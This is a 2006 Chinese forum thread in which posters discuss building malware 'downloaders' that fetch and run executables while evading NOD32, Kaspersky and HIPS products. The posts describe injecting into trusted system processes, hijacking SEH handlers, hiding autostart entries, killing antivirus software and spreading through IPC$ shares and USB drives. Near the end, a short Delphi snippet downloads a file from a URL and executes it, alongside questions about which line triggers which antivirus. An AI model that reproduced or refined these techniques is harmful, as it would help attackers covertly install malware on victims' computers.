本来我那个“下载者”也不想有自启动功能的，但考虑到要对付电话线拨号上网的“用户”，网速慢，老半天下不完，只好加上自启动。本来还有断点续传和流量控制功能（防止占带宽被发现），被我坚决顶住不干。再写下去“下载者”本身就是木马了。 [s:58]

防止扫描文件可以,弄个shellcode那样的代码应该可以.
防止行为检测,不知道注册一个seh,然后代码除0产生一个异常,异常中调socket做下载工作不知道可不可以.

引用:

这里是引用第[23 楼]的sunwear于2006-09-12 19:53发表的：

nod32查不出来 但运行的时候 应该过不了AVP的主动防御吧
似乎现在所谓的免杀不包括过主动防御

我以前写的一个“下载者”可以过KIS6(AVP)的主动防御，以及ZoneAlarm Pro6.5，Outpost，以及SSM等带有HIPS特性的安全产品。还考虑到了其他一些细节问题。呵呵，这个“下载者”应该比EVA的好点。不过zzzEVAzzz很久之前写的，现在再写的话应该有更大的提高~

引用:

这里是引用第[27 楼]的ZV于2006-09-12 21:30发表的：
防止扫描文件可以,弄个shellcode那样的代码应该可以.
防止行为检测,不知道注册一个seh,然后代码除0产生一个异常,异常中调socket做下载工作不知道可不可以.

SEH和过KIS6的主动防御没太大联系...

行为检测只会检测新软件吧,对于已经承认的软件应该不会去管他.
这样你把线程代码写入已经被行为检测承认的系统进程,再修改系统进程的fs0把seh指针指向刚才你写入的代码,构造一个seh,然后修改系统进程的某个代码为异常,比如int1,int3,然后等着触发,执行你的程序不就可以了.到时候再修改回来,反正传递过来的RECORD结构有足够的信息.
当然别的方法也有很多,不过极端的时候自己想一个出来总比脑袋里只有别人的想法要好吧.

引用:

这里是引用第[30 楼]的ZV于2006-09-14 10:30发表的：
行为检测只会检测新软件吧,对于已经承认的软件应该不会去管他.
这样你把线程代码写入已经被行为检测承认的系统进程,再修改系统进程的fs0把seh指针指向刚才你写入的代码,构造一个seh,然后修改系统进程的某个代码为异常,比如int1,int3,然后等着触发,执行你的程序不就可以了.到时候再修改回来,反正传递过来的RECORD结构有足够的信息.
当然别的方法也有很多,不过极端的时候自己想一个出来总比脑袋里只有别人的想法要好吧.

"这样你把线程代码写入已经被行为检测承认的系统进程"
当你做这一步时，有些HIPS就会报了：）

当然，可以进Ring0之后线程代码注入，不过进Ring0时好的HIPS也就会报了。

引用:

这里是引用第[30 楼]的ZV于2006-09-14 10:30发表的：
行为检测只会检测新软件吧,对于已经承认的软件应该不会去管他.
这样你把线程代码写入已经被行为检测承认的系统进程,再修改系统进程的fs0把seh指针指向刚才你写入的代码,构造一个seh,然后修改系统进程的某个代码为异常,比如int1,int3,然后等着触发,执行你的程序不就可以了.到时候再修改回来,反正传递过来的RECORD结构有足够的信息.
当然别的方法也有很多,不过极端的时候自己想一个出来总比脑袋里只有别人的想法要好吧.

这个动作应该已经报了吧
连后台程序主动防御都会报 汗

引用:

这里是引用第[21 楼]的zzzevazzz于2006-09-12 19:40发表的：


未必。我很久以前为公司写的一个“下载者”，nod32就查不出来。
没做什么特殊保护。普通的远程线程插入而已。

.......

你的意思垃圾功能越多越好？反正核心功能不变？

个人看法,前段时间MS已经做了对隐蔽式插入IE做了限制,人家不开IE,你的下载者就没有用,具我所知现在所有插入IE的下载者效率最多只有40%左右.

引用:

这里是引用第[35 楼]的tsgxyy于2006-09-15 05:56发表的：
个人看法,前段时间MS已经做了对隐蔽式插入IE做了限制,人家不开IE,你的下载者就没有用,具我所知现在所有插入IE的下载者效率最多只有40%左右.

=.=#
我的做法是 程序直接打开IE
不过是不显示


对于楼上几位牛人的批评~我承认的确自己写的是个普通的下载者
没什么特殊的功能
我不过是个学生
也不是学的计算机专业,我学的是国际经济与贸易
DELPHI完全是自学的
所以有很多东西也是弄不懂的
但毕竟是自己努力的成果

呵呵~~
下载者主要看选择了什么注册表项实现自启动——很多角落没有AV,HIPS注意~
另外看采用什么方法注入，user模式APC据说比remote好一些——没有大规模测试过~
另外就是对付nod32这样的干脆就把功能作复杂一点，支持休眠，自杀，MX快递自身，IPC$复制，usb移动设备携带等等~~

引用:

这里是引用第[36 楼]的vxk于2006-09-16 22:01发表的：
呵呵~~
下载者主要看选择了什么注册表项实现自启动——很多角落没有AV,HIPS注意~
另外看采用什么方法注入，user模式APC据说比remote好一些——没有大规模测试过~
另外就是对付nod32这样的干脆就把功能作复杂一点，支持休眠，自杀，MX快递自身，IPC$复制，usb移动设备携带等等~~

写这样的功能还是下载者嘛?直接一个感染病毒.

就我写的而言,做一个配置文件,想下多少EXE文件都没问题,不写注册表,插入进程之前,把能杀的杀毒软件统统KILL掉,立即下载,完毕自动消失,下来也就7K无压缩.

引用:

这里是引用第[36 楼]的vxk于2006-09-16 22:01发表的：
呵呵~~
下载者主要看选择了什么注册表项实现自启动——很多角落没有AV,HIPS注意~
另外看采用什么方法注入，user模式APC据说比remote好一些——没有大规模测试过~
另外就是对付nod32这样的干脆就把功能作复杂一点，支持休眠，自杀，MX快递自身，IPC$复制，usb移动设备携带等等~~

写这样的功能还是下载者嘛?直接一个感染病毒.

就我写的而言,做一个配置文件,想下多少EXE文件都没问题,不写注册表,插入进程之前,把能杀的杀毒软件统统KILL掉,立即下载,完毕自动消失,下来也就7K无压缩.

下载者自然要大量传播~~
最近xyzreg又发现了个进r0的新方法~~
哈哈~~

引用:

这里是引用第[11 楼]的xyzreg于2006-08-16 01:03发表的：

难道写注册表杀毒软件就会有提示么？要看你怎么写了。呵呵

请教下,如何作到的?

引用:

这里是引用第[40 楼]的x8user于2006-10-04 14:58发表的：


请教下,如何作到的?

角落~
AutoRuns大搜索，其实很多地方可以~~~

引用:

这里是引用第[41 楼]的vxk于2006-10-05 22:42发表的：
角落~
AutoRuns大搜索，其实很多地方可以~~~

哈哈，比如LSA XXX~

我在写下载者时发现，如果用createfile生成文件时候，扩展名不是exe，再使用writefile时就能不被nod32查杀。我要使用createprocess，shellexcute等函数运行该文件时，nod32就会报木马。不知道有没有什么办法解决？

program Project1;

{$APPTYPE CONSOLE}

uses
  SysUtils,
  shellapi,
  urlmon;
begin
urldownloadtofile(nil,'http://www.baidu.com','aa.txt',0,nil);
shellexecute(1,'open','aa.txt',nil,nil,1);
end.


我 是菜鸟,不会写生成的,我就做一个写个代码,就是上边这个,

不知道怎么回事,生成的就有39,936 字节,压缩后也还是很大,我想问下,怎么才能更小点呢?

还有就是这样写出来的,肯定能下载,肯定能运行,
这两句代码,去掉任意的一句都会被杀,我就郁闷了.
去掉第一句,卡巴杀,去掉第二局,NOD32杀!

楼上的可以看陈经韬先生用delphi写得下载者，很小，可以到他的首页下载：www.138soft.com
应该对你有帮助~！

改了下代码,有14K了.去掉了引用的SysUtils单元,怎么能再小点啊
非常感谢.

换语言写~~ [s:39]玩笑



http://www.138soft.com/html/ssc/more_1.htm

1K的delphi写的